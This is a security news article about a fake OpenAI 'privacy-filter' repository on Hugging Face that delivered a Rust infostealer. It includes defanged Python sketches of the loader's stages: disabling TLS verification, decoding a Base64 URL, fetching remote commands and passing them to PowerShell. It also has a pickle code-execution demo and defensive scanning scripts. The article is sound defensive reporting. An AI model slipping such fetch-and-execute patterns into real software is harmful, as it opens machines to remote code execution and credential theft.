Hugging Face Malware Posed as Fake OpenAI Release

The rapid rise of artificial intelligence has transformed how developers, researchers, and enterprises build software. Platforms like Hugging Face have become central hubs for sharing AI models, datasets, and development tools. However, a recent cybersecurity incident has revealed a dangerous new trend: attackers are now exploiting public AI repositories to distribute malware.

According to findings from AI security company HiddenLayer, a malicious repository hosted on Hugging Face successfully impersonated an OpenAI project and distributed credential-stealing malware to Windows users. The fake repository reportedly recorded approximately 244,000 downloads before it was removed, though researchers believe the numbers may have been artificially inflated to make the project appear trustworthy and widely adopted.

This incident highlights a growing concern surrounding AI software supply chains and the security risks associated with downloading unverified machine learning models and scripts.

Fake OpenAI Privacy Filter Repository Discovered

The malicious repository operated under the name “Open-OSS/privacy-filter,” closely mimicking a legitimate OpenAI Privacy Filter release. Researchers noted that the attackers copied the original project’s documentation almost word-for-word, making it appear authentic to unsuspecting developers and data scientists.

The fake repository even reached Hugging Face’s trending section, accumulating 667 likes in less than 18 hours. Security analysts believe these engagement metrics may also have been manipulated by attackers to increase credibility and visibility.

What made the attack particularly dangerous was the inclusion of a malicious loader.py file. While it appeared to function like a normal AI model setup script, it secretly downloaded and executed infostealer malware on Windows systems.

The README instructions were intentionally crafted to guide users into running infected files. Unlike the legitimate project, the malicious version instructed users to execute start.bat on Windows systems or run python loader.py on Linux and macOS devices. These commands triggered the malware infection chain.

How the Malware Infection Worked

HiddenLayer researchers explained that the loader.py script initially resembled a standard AI model loader. However, beneath the surface, it contained hidden malicious logic designed to compromise user systems.

The attack chain reportedly followed several stages:

1. SSL Verification Disabled

The malicious script first disabled SSL certificate verification, stripping out a core transport protection so it could communicate with attacker infrastructure without triggering certificate errors.
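
The exact attack code has not been published in full, but this step is easy to recognize once you know the pattern. The snippet below is a defanged sketch of the two most common ways a Python script disables certificate verification; the URL is a placeholder, not the attacker's infrastructure:

```python
# Defanged sketch: two common ways a Python script disables TLS
# certificate verification. Either pattern inside a "model loader"
# deserves scrutiny before the script is ever run.
import ssl
import requests

# Pattern 1: swap the default HTTPS context for an unverified one,
# which affects urllib and anything built on the standard library.
ssl._create_default_https_context = ssl._create_unverified_context

# Pattern 2: disable verification per request with the requests library.
response = requests.get("https://example.com/config", verify=False)
```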

2. Base64-Encoded URL Decoding

The script then decoded a hidden Base64-encoded URL pointing to jsonkeeper.com, an external JSON-hosting service that the attackers repurposed as a lightweight command-and-control channel.
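
Base64 is not encryption; it merely hides the string from a casual skim of the source. A minimal illustration, where the encoded value decodes to a harmless placeholder rather than the real jsonkeeper.com address:

```python
# Minimal illustration of the obfuscation: Base64 hides the URL from
# a casual read of the code but decodes in one line at run time.
import base64

encoded = "aHR0cHM6Ly9leGFtcGxlLmNvbS9wYXlsb2Fk"  # placeholder value
url = base64.b64decode(encoded).decode("utf-8")
print(url)  # -> https://example.com/payload
```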

3. Remote Payload Retrieval

After establishing communication, the malware downloaded additional instructions remotely. This method allowed attackers to update or rotate malicious payloads without modifying the repository itself, making detection more difficult.
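
The retrieval step itself needs only a few lines; what matters is that the payload lives server-side. A hedged sketch, assuming a simple HTTP GET as HiddenLayer's description suggests:

```python
# Sketch of stage 3: the script fetches its real instructions at run
# time, so the repository on Hugging Face never has to change for the
# attacker to rotate payloads.
import requests

def fetch_instructions(url: str) -> str:
    response = requests.get(url, timeout=10)  # url came from stage 2
    response.raise_for_status()
    return response.text  # response body is treated as commands

# commands = fetch_instructions(url)
```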

4. PowerShell Execution on Windows

The retrieved commands were passed directly to PowerShell on Windows systems. The PowerShell process downloaded another batch file from an attacker-controlled domain.
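
The exact invocation used in the attack was not published, but handing remote text to PowerShell from Python typically looks like the sketch below. A subprocess call to "powershell -Command" with a variable argument is the tell-tale pattern for reviewers:

```python
# Sketch of stage 4: untrusted text from the network is passed
# straight to PowerShell for execution.
import subprocess

def run_via_powershell(commands: str) -> None:
    subprocess.run(
        ["powershell", "-NoProfile", "-Command", commands],
        check=False,
    )
```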

5. Persistence Mechanism

The malware then created a scheduled task disguised as a legitimate Microsoft Edge update process. This persistence technique ensured the malware continued operating even after system restarts.
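
HiddenLayer's report does not name the exact task, so the check below is a generic defensive sketch: enumerate scheduled tasks and flag Edge-branded names whose action does not run from a Microsoft directory. The column names assume an English-language Windows install, and the heuristics are assumptions to tune:

```python
# Defensive sketch: flag scheduled tasks that borrow Microsoft Edge
# branding but point somewhere unexpected. Heuristics only; verify
# hits manually before deleting anything.
import csv
import io
import subprocess

result = subprocess.run(
    ["schtasks", "/query", "/v", "/fo", "CSV"],
    capture_output=True, text=True, check=True,
)

for row in csv.DictReader(io.StringIO(result.stdout)):
    name = row.get("TaskName", "")
    action = row.get("Task To Run", "")
    if "edge" in name.lower() and "microsoft" not in action.lower():
        print(f"Suspicious task: {name} -> {action}")
```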

Rust-Based Infostealer Malware Targeted Sensitive Data

The final payload deployed in the attack was a Rust-based infostealer. According to HiddenLayer, the malware targeted multiple sensitive data sources commonly found on developer machines.

The malware attempted to steal:

  • Chromium-based browser data
  • Firefox browser information
  • Discord local storage
  • Cryptocurrency wallet files
  • FileZilla configuration data
  • Host system information
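
The exact paths the malware read were not published, but stealers of this family typically hit well-known default locations. A small triage sketch that checks which of those locations exist on a Windows host (the paths are standard defaults and assumptions; adjust for portable or non-default installs):

```python
# Triage sketch: check which commonly targeted artifact locations
# exist on a Windows machine, to help scope an investigation.
import os

ARTIFACTS = {
    "Chromium login data": r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data",
    "Firefox profiles": r"%APPDATA%\Mozilla\Firefox\Profiles",
    "Discord local storage": r"%APPDATA%\discord\Local Storage\leveldb",
    "FileZilla site manager": r"%APPDATA%\FileZilla\sitemanager.xml",
}

for label, raw in ARTIFACTS.items():
    path = os.path.expandvars(raw)
    status = "present" if os.path.exists(path) else "not found"
    print(f"{label}: {status}")
```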

Researchers also found that the malware tried to disable key Windows security protections, including:

  • Windows Antimalware Scan Interface (AMSI)
  • Event Tracing for Windows (ETW)

Disabling these protections can make malware harder to detect and analyze using traditional security tools.

AI Repositories Are Becoming Software Supply Chain Risks

The attack demonstrates how public AI repositories are increasingly becoming part of the modern software supply chain attack surface.

Developers and organizations frequently clone machine learning models directly into production or corporate environments. These environments often contain:

  • Cloud credentials
  • Internal APIs
  • Source code repositories
  • Sensitive datasets
  • Enterprise authentication tokens

Unlike traditional software packages, AI repositories commonly include executable scripts, notebooks, dependency installers, and setup instructions. While the AI models themselves may be harmless, these surrounding files can easily be weaponized.
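
One practical habit follows directly from this: before running anything from a freshly cloned repository, grep it for the red-flag patterns described earlier. A minimal sketch (heuristics only; a clean result is not a guarantee of safety):

```python
# Pre-flight sketch: scan a cloned repository's Python files for the
# red-flag patterns seen in this campaign. A hit means "read this
# closely", not "definitely malware"; no hit proves nothing.
import pathlib
import re

RED_FLAGS = re.compile(
    r"verify\s*=\s*False"
    r"|_create_unverified_context"
    r"|base64\.b64decode"
    r"|powershell"
    r"|subprocess\.(?:run|Popen|call)",
    re.IGNORECASE,
)

def scan_repo(root: str) -> None:
    for path in pathlib.Path(root).rglob("*.py"):
        lines = path.read_text(errors="ignore").splitlines()
        for lineno, line in enumerate(lines, start=1):
            if RED_FLAGS.search(line):
                print(f"{path}:{lineno}: {line.strip()}")

# scan_repo("./privacy-filter")  # hypothetical local clone
```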

Security experts have repeatedly warned that malicious code can be embedded inside AI-related resources. Earlier incidents involved pickle-serialized model files capable of bypassing platform scanners and executing hidden code during deserialization.
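
The pickle risk is easy to demonstrate: a Python object can define __reduce__ to tell pickle how to rebuild it, and that hook runs an arbitrary callable during loading. The toy example below only prints a message, but it shows why loading a pickled model file is equivalent to executing code:

```python
# Why pickled model files are dangerous: unpickling an object runs
# whatever callable its __reduce__ hook returns. Here it just prints;
# a malicious file could run anything.
import pickle

class Rigged:
    def __reduce__(self):
        return (print, ("this code ran during unpickling",))

blob = pickle.dumps(Rigged())
pickle.loads(blob)  # loading the "model" executes the payload
```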

The Hugging Face malware case shows attackers are now expanding beyond model files and targeting developer workflows directly.

HiddenLayer Identified Additional Malicious Repositories

The investigation did not stop with a single repository.

HiddenLayer researchers reportedly uncovered six additional Hugging Face repositories containing nearly identical loader logic and shared attacker infrastructure. This suggests the campaign may have been larger and more coordinated than initially believed.

The incident also follows previous reports involving:

  • Poisoned AI SDKs
  • Fake OpenClaw installers
  • Malicious dependency packages targeting AI developers

Cybercriminals are increasingly viewing AI ecosystems as valuable entry points into otherwise secure enterprise environments.

Traditional Security Tools May Not Be Enough

One of the most concerning aspects of this attack is how easily it bypassed traditional software security approaches.

Sakshi Grover, senior research manager for cybersecurity services at IDC, explained that conventional Software Composition Analysis (SCA) tools were primarily designed to inspect dependency manifests, container images, and software libraries.

However, these tools are often ineffective against malicious loader scripts hidden inside AI repositories.

IDC’s November 2025 FutureScape report predicted that by 2027, nearly 60% of agentic AI systems would require a bill of materials (BOM). Such AI-BOM frameworks would help organizations track:

  • AI artifacts in use
  • Approved versions
  • Repository sources
  • Embedded executable components
  • Dependency relationships

This visibility could significantly improve AI supply chain security and reduce the risk of compromised repositories entering enterprise systems.
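
IDC does not prescribe a schema, so the sketch below is purely illustrative of the kind of record an AI-BOM might keep per artifact; the field names and values are hypothetical:

```python
# Illustrative AI-BOM entry covering the fields listed above.
# Hypothetical schema, not a standard.
from dataclasses import dataclass, field

@dataclass
class AIBomEntry:
    artifact: str                   # model, dataset, or script in use
    approved_version: str           # pinned revision that passed review
    source: str                     # repository the artifact came from
    executables: list[str] = field(default_factory=list)   # scripts/notebooks it ships
    dependencies: list[str] = field(default_factory=list)  # packages it pulls in

entry = AIBomEntry(
    artifact="privacy-filter (model)",
    approved_version="rev abc123",  # hypothetical pinned revision
    source="https://huggingface.co/example-org/privacy-filter",  # placeholder URL
    executables=["loader.py", "start.bat"],
    dependencies=["torch", "transformers"],
)
```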

Hugging Face Removed the Malicious Repository

Following the disclosure, Hugging Face confirmed that the malicious repository had been removed from the platform.

Users who downloaded or executed files from the repository have been advised to treat affected systems as fully compromised.

HiddenLayer specifically advised users to immediately isolate and re-image any system on which they ran:

  • start.bat
  • python loader.py
  • Any executable from the repository

Researchers also warned that browser sessions should be considered compromised, even when passwords are not stored locally. Attackers can use stolen session cookies to bypass multi-factor authentication (MFA) protections in some cases.

How Developers Can Protect Themselves

As AI development ecosystems continue growing, developers and enterprises must adopt stronger security practices when working with public AI repositories.

Key security recommendations include:

Verify Repository Authenticity

Always confirm repository ownership, official links, and publisher reputation before downloading files.
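
On Hugging Face specifically, the huggingface_hub client exposes repository metadata that can feed this check. A minimal sketch follows; the repo id is just an example, and since this incident showed downloads and likes can be inflated, treat the metrics as inputs to human judgment rather than proof:

```python
# Sketch: pull repository metadata before downloading anything.
# No single metric proves legitimacy; engagement can be gamed.
from huggingface_hub import HfApi

api = HfApi()
info = api.model_info("openai-community/gpt2")  # example repo id

print("author:   ", info.author)
print("downloads:", info.downloads)
print("likes:    ", info.likes)
print("files:    ", [s.rfilename for s in info.siblings])
```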

Avoid Running Unknown Setup Scripts

Never execute batch files, PowerShell commands, or Python scripts from unverified sources without inspection.

Use Sandboxed Environments

Run AI models inside isolated virtual machines or containers whenever possible.

Monitor Outbound Connections

Unexpected external connections may indicate malicious behavior.
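
A rough way to do this on a single machine is to snapshot established connections while a new model loader runs, so unfamiliar destinations stand out. A sketch using the third-party psutil package (some processes are only visible with elevated privileges):

```python
# Sketch: list established outbound TCP connections and their remote
# endpoints while untrusted code runs.
import psutil

for conn in psutil.net_connections(kind="tcp"):
    if conn.status == psutil.CONN_ESTABLISHED and conn.raddr:
        print(f"pid={conn.pid} -> {conn.raddr.ip}:{conn.raddr.port}")
```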

Scan Files Before Execution

Use endpoint detection and malware scanning tools to inspect repositories and dependencies.

Implement AI Bill of Materials (AI-BOM)

Organizations should maintain detailed inventories of all AI models, dependencies, scripts, and artifacts used internally.

Conclusion

The fake OpenAI Privacy Filter incident on Hugging Face serves as a major warning for the AI industry. Attackers are actively targeting AI development workflows, exploiting the trust developers place in public repositories and trending projects.

As AI adoption accelerates across enterprises, securing machine learning supply chains will become just as important as protecting traditional software ecosystems.

The incident also reinforces a critical lesson for developers: AI repositories are not just collections of models. They often contain executable code capable of introducing serious cybersecurity risks into corporate environments.

With malicious AI repositories becoming more sophisticated, organizations must strengthen verification, monitoring, and supply chain security practices before these attacks become even more widespread.
